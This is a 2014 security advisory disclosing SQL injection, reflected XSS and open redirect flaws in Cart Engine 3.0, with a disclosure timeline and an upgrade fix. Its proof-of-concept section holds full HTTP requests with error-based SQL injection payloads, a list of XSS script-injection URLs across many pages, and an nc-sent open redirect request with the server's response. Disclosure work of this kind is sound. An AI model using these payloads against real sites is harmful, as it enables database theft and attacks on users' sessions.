Cart Engine 3.0 - Multiple Vulnerabilities





Platform:

PHP

Date:

2014-09-25


=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0

=== Executive Summary ===

SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
of cart.php page. Successful exploitation of the vulnerabilities results in read
sensitive data from the database and, in some cases, execute administration
operation on the database or issue commands to the operating system.

Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
a lack in the neutralization[2] of multiple pages output which includes the user
submitted content. Successful exploitation of the vulnerabilities, results in
the execution of arbitrary HTML and script code in the user’s browser in the context of
the victim user's session trough a “Reflected XSS”.

Open Redirect: Using a specially crafted HTTP request, it is possible to
redirect[3] the normal browsing of users to a malicious site by modifying
untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
msg.php and page.php pages. Successful exploitation of the vulnerabilities
results in phishing scam, user credential theft, malware dissemination.

=== Proof of Concept ===

= SQL Injection (based on MySQL) =

A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id”
parameter, so error based and boolean-based blind or time-based blind SQL
Injection attacks can be executed.


## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774

-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"

add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"

8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##

## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353

-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"

add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"

13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"

3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"

' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"


-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"

1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##

= Reflected XSS =

A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
"footer_content_block" are not sanitized, so an XSS attack can be executed on
multiple pages.

## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##

= Open Redirect =

An Open Redirect vulnerability has been detected on multiple pages in Cart
Engine CMS. The function "redir" in file "includes/function.php" doesn't check
the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
executed.

## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close


$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

 sent 403, rcvd 380

=== Solution ===

Upgrade to Cart Engine 4.0.

=== Disclosure Timeline ===

2014-08-08 – Vulnerability Discovered
2014-08-10 – Initial vendor notification
2014-08-20 – The vendor fixed the vulnerability
2014-09-15 – Public advisory

=== References ===

[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet